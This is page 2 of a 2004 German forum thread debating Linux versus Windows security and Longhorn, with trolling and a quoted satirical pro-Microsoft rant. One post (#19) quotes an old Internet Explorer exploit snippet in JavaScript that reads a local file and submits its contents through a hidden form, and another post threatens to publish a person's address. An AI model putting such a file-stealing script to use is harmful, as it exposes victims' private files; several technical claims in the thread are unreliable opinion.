WinFuture-Forum.de: Longhorn, Linux - Features - WinFuture-Forum.de

Zum Inhalt wechseln

Nachrichten zum Thema: Software
  • 2 Seiten +
  • 1
  • 2

Longhorn, Linux - Features

#16 Mitglied ist offline   ph030 

  • Gruppe: aktive Mitglieder
  • Beiträge: 5.130
  • Beigetreten: 14. Juli 04
  • Reputation: 36
  • Geschlecht:unbekannt

geschrieben 17. September 2004 - 14:01

@ scrypthon

Dein "GamersFuture"-Server läuft wahrscheinlich auch unter Windows?

Request ist raus!

Manu
0

Anzeige



#17 Mitglied ist offline   Z3rO 

  • Gruppe: aktive Mitglieder
  • Beiträge: 109
  • Beigetreten: 13. September 04
  • Reputation: 0

geschrieben 17. September 2004 - 14:02

Zitat

Linux hatte seit der Version 2.4.16 weitaus verhendere Sicherheitsloecher als Windows gehabt.


Irgendwie kann ich mich an keine Massenepidemie alla Blaster/Netsky/Sasser und wie sie alle heissen erinnern, die je ein Linux OS betroffen hätte.
0

#18 Mitglied ist offline   ph030 

  • Gruppe: aktive Mitglieder
  • Beiträge: 5.130
  • Beigetreten: 14. Juli 04
  • Reputation: 36
  • Geschlecht:unbekannt

geschrieben 17. September 2004 - 14:03

*zustimm* und dass lag sicher nicht nur an der weiten Verbreitung von Windows!

EDIT:

Also entweder er ist jetzt beleidigt, oder ihm ist die Kiste abgeschmiert?! Nicht mehr auf'm Board, nix zu sehen im ICQ?

Dieser Beitrag wurde von ph030 bearbeitet: 17. September 2004 - 14:23

0

#19 Mitglied ist offline   Rika 

  • Gruppe: aktive Mitglieder
  • Beiträge: 11.533
  • Beigetreten: 11. Juni 03
  • Reputation: 2
  • Geschlecht:Männlich

geschrieben 17. September 2004 - 16:34

@Thovost & ph030:
Man nur etwas _für_ bzw. _gegen_ ein API coden (woebi beides das gleiche bedeutet).

@Scrypton:

Zitat

Programmiere mir dann bitte ein besseres Betriebsystem als Windows NT

Besser im Bezug auf was? Stabilität? Sicherheit? Quelloffenheit? Flexibilität? Linux. :-)

Zitat

bessere Officepakete

OpenOffice - das kann sogar besser mit Microsofts hauseigenem Word- und Excelformat umgehen als MS Office selber, von den vielen Details und der Stabilität mal abgesehen.

Zitat

und bessere Grafiklibraries

Motif/Lesstif, GTK, X11, OpenGL... wobei Lesstif noch nicht so toll ist. Naja, Grafik ist relativ.

Zitat

Linux hatte seit der Version 2.4.16 weitaus verhendere Sicherheitsloecher als Windows gehabt.

Beweise? Glaubwürdigkeit? Ich jedenfalls halte diese Behauptung für absolut lächerlich.

Zitat

Mein Kumpel außerdem nennt sich Nookie (kennste vieleicht sogar ?) und ist seit 2 Jahren dabei ein OS zu entwickeln bzw. gibts schon erste Screens.....

Prima, ich habe nämlich schon ein OS entwickelt, in Assembler auf einem 386er anno 1996 nur mit TASM+ RBIL als Doku. Die grundlegenden internen Desigstrukutren ähnelten dem NT5-Kernel, der damals eher nur als Quark im Schaufenster existierte.

Zitat

@ph030: Aehm, wenn du ICQ hast

Groß mit Sicherheit prahlen, aber bevorzugt mit ICQ kommunizieren...

@ph030:

Zitat

Nimm *BSD, Solaris, Linux! Die bieten allesamt mehr Performance

BSD und Performance... naja, da würde ich dochmal etwas vorsichtiger sein.

Zitat

Und wie war das mit der Sicherheitslücke aus dem IE 3/4? Das ist jetzt schon zig Jahre her und wurde bis heute noch net gefixt.

a=window.open("file://c:\Dokumente und Einstellungen\All Users\Gemeinsame Dateien\Gemeinsame Dokumente\x.txt");
b=a.document.body.innerHTML;
a.close();
document.c.d.value=b;
document.c.e.focus();
document.execCommand("paste");
document.c.e.style.visibility="hidden";
document.c.submit();

@Z3ro:
Doch, der Morris Wurm. Irgendwann 1986, als die größte Lücke noch vertrottelte Admins von BSD/SysV/AIX-Systemen wahren...

Dieser Beitrag wurde von Rika bearbeitet: 17. September 2004 - 16:37

Konnichiwa. Manga wo shitte masu ka? Iie? Gomenne, sonoyouna koto ga tabitabi arimasu. Mangaka ojousan nihongo doujinshi desu wa 'Clamp X', 'Ayashi no Ceres', 'Card Captor Sakura', 'Tsubasa', 'Chobits', 'Sakura Taisen', 'Inuyasha' wo 'Ah! Megamisama'. Hai, mangaka gozaimashita desu ni yuujin yori.
Eingefügtes Bild
Ja, mata ne!

(For sending email please use OpenPGP encryption and signing. KeyID: 0xA0E28D18)
0

#20 Mitglied ist offline   Z3rO 

  • Gruppe: aktive Mitglieder
  • Beiträge: 109
  • Beigetreten: 13. September 04
  • Reputation: 0

geschrieben 17. September 2004 - 18:02

Zitat

Doch, der Morris Wurm. Irgendwann 1986, als die größte Lücke noch vertrottelte Admins von BSD/SysV/AIX-Systemen wahren...


Das gilt nicht! Da habe ich grade angefangen auf Pappas 286er rumzuhämmern. :sofa:
0

#21 Mitglied ist offline   Rika 

  • Gruppe: aktive Mitglieder
  • Beiträge: 11.533
  • Beigetreten: 11. Juni 03
  • Reputation: 2
  • Geschlecht:Männlich

geschrieben 17. September 2004 - 18:54

Ja und? Als ich das erste mal im Netz war gab es schon 56K-Modems!
Konnichiwa. Manga wo shitte masu ka? Iie? Gomenne, sonoyouna koto ga tabitabi arimasu. Mangaka ojousan nihongo doujinshi desu wa 'Clamp X', 'Ayashi no Ceres', 'Card Captor Sakura', 'Tsubasa', 'Chobits', 'Sakura Taisen', 'Inuyasha' wo 'Ah! Megamisama'. Hai, mangaka gozaimashita desu ni yuujin yori.
Eingefügtes Bild
Ja, mata ne!

(For sending email please use OpenPGP encryption and signing. KeyID: 0xA0E28D18)
0

#22 Mitglied ist offline   Anderländer 

  • Gruppe: aktive Mitglieder
  • Beiträge: 1.144
  • Beigetreten: 03. Juli 04
  • Reputation: 0

geschrieben 19. September 2004 - 20:12

mh ok suse linux hat 75 sicherhjeits fehler aber die sind ganz leicht zu beheben wenn man weis wie die datein heisen und wo die liegen muss man die grad umbenen oder verschieben und weg sind die sicherheits lücken. Und zu deinen Nookie der angeblich bekannt ist aber unter den großen häckern gild der als cracker und net als hacker wenn ich wollte könnte ich jetzt noch seine anschrieft hier nei schreiben mach ich aber oder den bulllen geben das die mal seine wohnung nach ilegalem zeugs durchsuchen mal schauen was der dann dazu sagt das du einfach seinen namen in ein öffentliches forum schreibt, des macht noch net mal ein drei jähriger.
MH BSD (BSE) hat net so wirklich performance naja ich glaub des wird sich aber mit der zeit noch geben, ist ja noch in den Kinderschuhen. Und moch mal zu den sicherheits lücken Windows wird in der ersten verkaufs version mit mehrern millionen lücken aus geliefert von dennen mindestens 10% Größere sicherheits lücken sind durch die man ins sytem eindringen kann oder es von aussen zersören kann.

Gruß Flo
Eingefügtes Bild

Sorry leuts wechen Rechtschreib fehlern und der schlechten Grammatik ich bin leider Legasteniker.
0

#23 _fUcKiNg*TaSte_

  • Gruppe: Gäste

geschrieben 21. September 2004 - 13:18

hört sich an nach gratiszugangstool <_<


by Gratiszugangstool:
Ersteinmal hat Microsoft so viele Erfindungen gemacht, dass selbst
ein Thomas Edison alt dagegen aussieht. Diese Freude an Erfindungen
und Innovationen, die Microsoft Tag für Tag auf's neue beweist, macht
natürlich viele Firmen neidisch. Diese kopieren denn einfach
Microsofts Ideen und behaupten dann, dass sie sie erfunden hätten.

Beispiele:
- Apple/Linux/OS2 und fast alle Betriebssysteme verwenden eine
graphische Oberfläche (GUI), die ja bekanntlich von Microsoft mit
Windows 1.0 erfunden und eingeführt wurde
- 3D Beschleuniger und moderne Soundkarten werden von anderen
Betriebssystemen unterstützt, ohne Microsoft Lizenzgebühren zu
zahlen, obwohl Microsoft auch diese beiden wichtigen Komponenten
erfunden hat
- dank dem Internet können viele Firmen großen Gewinn erwirtschaften;
aber Microsoft sieht keinen Cent, obwohl sie auch dieses wichtige
Medium erfanden
- Apple kopierte die Maus, die im Zusammenhang mit der GUI von
Microsoft erfunden wurde, auch noch schlecht; nämlich mit nur einer
Taste!
- Teile vom Linux-Code stammen von Microsoft (Beweis: Diese News:
heise.de/newsticker/data/ghi-27.07.03-000)
- Sun kopierte die Microsoft Java VM und nennt sie jetzt Sun Java VM
- Efindung eines modernen PDAs (PocketPCs mit 400Mhz, 64MB Ram,
u.s.w.), was jetzt auch von Palm ausnahmslos kopiert wird
- Das SmartPhone wurde ebenfalls von Microsoft erfunden, welches das
Handy über kurz oder lang ablösen wird
- Sprachsteuerung für PocketPCs und Smartphones, damit das Steuern
der mobilen Geräte noch mehr Spaß macht und auch behinderte Menschen
Zugang zur modernen Technik bekommen können
- WMA (neuer, innovativer Codec, der wieder einmal eine ganze Branche
bzw. sogar zwei (!) revolutionieren wird)
- WMV (neuer, innovativer Codec, der wieder einmal eine ganze Branche
bzw. sogar zwei (!) revolutionieren wird)
- WirelessLan stammt ursprünglich von Microsoft, was jedoch nur
wenigen Profis bekannt ist, und wird jetzt von jemand anderem
beansprucht

Es gibt natürlich noch viele weitere Beispiele, die mir jetzt gerade
nicht einfallen und ich sowieso nicht alle aufzählen möchte.

Microsoft hat aber auch den IT-Markt vorangetrieben, indem sie
wichtige technische Neuerungen unterstützten, wie z.B.
- das CD-Rom Laufwerk
- den CD-Brenner
- das DVD-Laufwerk
- den DVD-Brenner
- Breitbandinternet
- Scanner
- Drucker
- Digital-Kameras
- u.s.w.


Ihr seht also: Microsoft ist einfach die beste Firma der Welt!
Keine Firma ist so großzügig, kamaradschaftlich, einfühlam, spendabel
und bringt der Menschheit so viel Gutes wie Microsoft.

Ich spreche täglich ein Dankgebet für die ganzen Innovationen und
guten Sachen, die uns Microsoft gebracht hat.

Microsoft unterstützt nicht nur die Konkurenten, die Microsoft auch
noch ausbeuten, nein, der Dritten Welt kommt auch noch
ein nicht gerade geringer Teil des Gewinns von Microsoft zu gute!

Aber nicht nur die Armen und die Konkurenz haben etwas von der
Wohltätigkeit Microsofts.

Natürlich bekommt auch jeder etwas vom Wohl Microsofts ab, der sich
etwas von Microsoft gekauft hat oder sich für Microsoft einsetzt.

Ich finde so etwas einfach klasse! Microsoft wird uns noch so weit
voran bringen, dass uns die entfernte Zukunft und ein besseres Leben
schon morgen erwarten.
Danke Microsoft!

Microsoft hat schon mehrmals unser Leben verändert, denn durch die
Erfindung des Computers, des Internets und moderner Speichermedien
wurde uns das Leben dank Microsoft wieder einmal ein ganzes Stück
leichter gemacht!

Einfach klasse!

Abends stoße ich dann mit Freunden bei einem köstlichen Abendessen
auf das weitere Wohl von Microsoft an!

Während der Arbeit erfreue ich mich an den Erfolgen, die wir nur
dank Microsoft erreicht haben.

Und in meiner Freizeit beschert mir mein wunderschöner Windows Server
2003 Enterprise Edition Stunden voller Freude.


FAZIT:
Microsoft RULEZ!!!!!!!!!!!!!!!!!!!!!!!1111111111111einseins
Windows natürlich auch!!!!!!!!!!!!!!!11111111111einseins



Denkt' mal drüber nach!

Gratis-Zugangstool, Chefentwickler und Profi
0

#24 Mitglied ist offline   Thovost 

  • Gruppe: aktive Mitglieder
  • Beiträge: 157
  • Beigetreten: 14. Februar 04
  • Reputation: 0
  • Wohnort:Hamburg

geschrieben 21. September 2004 - 13:43

naja soweit ich eiß hat ms nicht das internet erfunden und den Computer erst recht nicht..
denk du mal drüber nach
0

#25 Mitglied ist offline   Mr_Maniac 

  • Gruppe: aktive Mitglieder
  • Beiträge: 770
  • Beigetreten: 29. Juli 02
  • Reputation: 1
  • Geschlecht:Männlich
  • Interessen:Vieles rund um den Computer
    Musik

geschrieben 21. September 2004 - 13:59

@Thovost:
Das, was "fUcKiNg*TaSte" geposted hat, wurde von einem bekannten Troll geschrieben, der meinte, dass MS eben all das erfunden hat und die beste Firma der Welt ist...

Natürlich ist es in Wahrheit genau andersherum...
MS kopiert tatsächlich viel... Oder hat mal viel kopiert...
Nur dieser "Troll" namens "Gratiszugangstool" kommt mit solchen Texten an...
Ob er es wirklich ernst meint oder nicht... Weiss man halt nicht genau...

Zurück zum Thema:
Ich finde, dass Linux und Windows nahezu Gleichstand haben...
Man muss sich allerdings mit dem OS auskennen, um es sicherer, schneller oder stabiler zu machen. Dies trifft auf BEIDE Betriebssysteme zu...
Ich persönlich verwende auch beides...

Und beides läuft nahezu gleich gut...

Jedoch favorisiere ich Linux ganz klar im Serverbereich.
Denn ohne GUI und richtig eingerichtet ist es (zumindest meiner Meinung nach) dann doch "einen Tick" schneller und stabiler.
0

#26 Mitglied ist offline   Thovost 

  • Gruppe: aktive Mitglieder
  • Beiträge: 157
  • Beigetreten: 14. Februar 04
  • Reputation: 0
  • Wohnort:Hamburg

geschrieben 21. September 2004 - 14:01

aso ok wusste ich ja net xD
0

#27 Mitglied ist offline   Rika 

  • Gruppe: aktive Mitglieder
  • Beiträge: 11.533
  • Beigetreten: 11. Juni 03
  • Reputation: 2
  • Geschlecht:Männlich

geschrieben 21. September 2004 - 19:22

@Anderländer: Ich schätze mal daß ein Großteil der Lücken in Windows entweder Priviledge Elevations oder gar Local Root Exploits sind, vielleicht auch einige Race Conditions. Aber das sowas nur lokal gut administrierte Systeme betrifft und die meisten Windows-User schon an Remote-Sicherheitslücken scheitern kann MS sowas wunderbar unter den Tisch kehren.

@Mr_Maniac:

Zitat

Ich finde, dass Linux und Windows nahezu Gleichstand haben...

Ach ja? AFAIK kann man bei Windows an der Shell noch gar nix pipen, mit Longhorn wird man nur .NET-Objekte pipen können... Sprich: Die Designphilosophien sind doch ziemlich verschieden.
Konnichiwa. Manga wo shitte masu ka? Iie? Gomenne, sonoyouna koto ga tabitabi arimasu. Mangaka ojousan nihongo doujinshi desu wa 'Clamp X', 'Ayashi no Ceres', 'Card Captor Sakura', 'Tsubasa', 'Chobits', 'Sakura Taisen', 'Inuyasha' wo 'Ah! Megamisama'. Hai, mangaka gozaimashita desu ni yuujin yori.
Eingefügtes Bild
Ja, mata ne!

(For sending email please use OpenPGP encryption and signing. KeyID: 0xA0E28D18)
0

#28 Mitglied ist offline   Ich 

  • Gruppe: aktive Mitglieder
  • Beiträge: 284
  • Beigetreten: 11. März 02
  • Reputation: 0
  • Geschlecht:Männlich

geschrieben 21. September 2004 - 19:33

Frage mich eh, wie das bei Longhorn laufen wird.... bisher ist der Quatsch mit der Mischung aus .NET und COM Komponenten für Entwickler ein Graus. Wenn da nicht eine einheitliche Schnittstelle gefunden wird, dann wird das genauso unfreundlich bleiben wie es jetzt ist. Weiterhin frage ich mich eh, warum ein .NET Framework größer sein muß als Java, aber dennoch im Endeffekt weniger kann :smokin:

Da doch lieber gleich Linux und Java als ein .NET Framework, mit dem man nichtmal aus einer VB Anwendung ohne großen Aufwand eine Mail versenden kann :unsure:
Fatal error: Call to undefined function: brain() in head.php on line 2
0

#29 Mitglied ist offline   ronni 

  • Gruppe: aktive Mitglieder
  • Beiträge: 687
  • Beigetreten: 12. April 03
  • Reputation: 0

geschrieben 21. September 2004 - 21:25

Also ihr müsst zeit fürs schreiben haben.... Die hät ich auch gern.
Eingefügtes Bild
0

#30 Mitglied ist offline   Stulle 

  • Gruppe: aktive Mitglieder
  • Beiträge: 763
  • Beigetreten: 04. Dezember 03
  • Reputation: 0
  • Wohnort:Brotbackautomat
  • Interessen:viele

geschrieben 21. September 2004 - 22:25

Zitat (fUcKiNg*TaSte: 21.09.2004, 14:18)

hört sich an nach gratiszugangstool :)



............... und er ist fromm und betet Bill Gates an


:unsure: :smokin: :wink:
..................................

Die Signatur ist verloren gegangen. Eingefügtes Bild
0

Thema verteilen:


  • 2 Seiten +
  • 1
  • 2

1 Besucher lesen dieses Thema
Mitglieder: 0, Gäste: 1, unsichtbare Mitglieder: 0